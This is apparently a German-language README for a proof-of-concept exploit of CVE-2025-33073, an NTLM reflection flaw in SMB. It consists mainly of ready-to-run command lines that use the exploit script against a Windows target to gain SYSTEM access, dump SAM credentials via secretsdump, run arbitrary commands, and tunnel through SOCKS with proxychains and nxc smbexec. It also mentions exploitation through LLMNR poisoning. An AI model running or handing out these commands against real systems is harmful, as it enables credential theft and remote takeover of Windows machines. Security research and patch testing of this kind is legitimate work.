
PoC-Exploit für den NTLM-Reflection-SMB-Fehler.
PoC-Exploit für den NTLM-Reflection-SMB-Fehler.
Alle Credits gehen an die offizielle Forschung:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
Betriebssystem: Kali Linux (hat die meisten Pakete vorinstalliert).
GUI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

CLI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

Benutzerdefinierter Befehl
Anstatt secretsdump auszuführen, kann ein benutzerdefinierter Befehl ausgeführt werden.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS
Für eine heimlichere Ausführung von Befehlen, nachdem eine gültige Verbindung als SYSTEM hergestellt wurde. --target und --target-ip sollten hier gleich sein.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
Außerdem kann ein benutzerdefinierter Befehl über proxychains ausgeführt werden, anstatt die SAM zu dumpen.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Wenn du dich im selben Broadcast-Domain wie das Gerät befindest und es anfällig für LLMNR-Poisoning ist, ist es möglich, ein Gerät auszunutzen, ohne einen DNS-Eintrag registrieren zu müssen.

Lokale NTLM-Authentifizierung findet statt

Lokale NTLM-Authentifizierung findet nicht statt, was zu einem FEHLGESCHLAGENEN Versuch führt
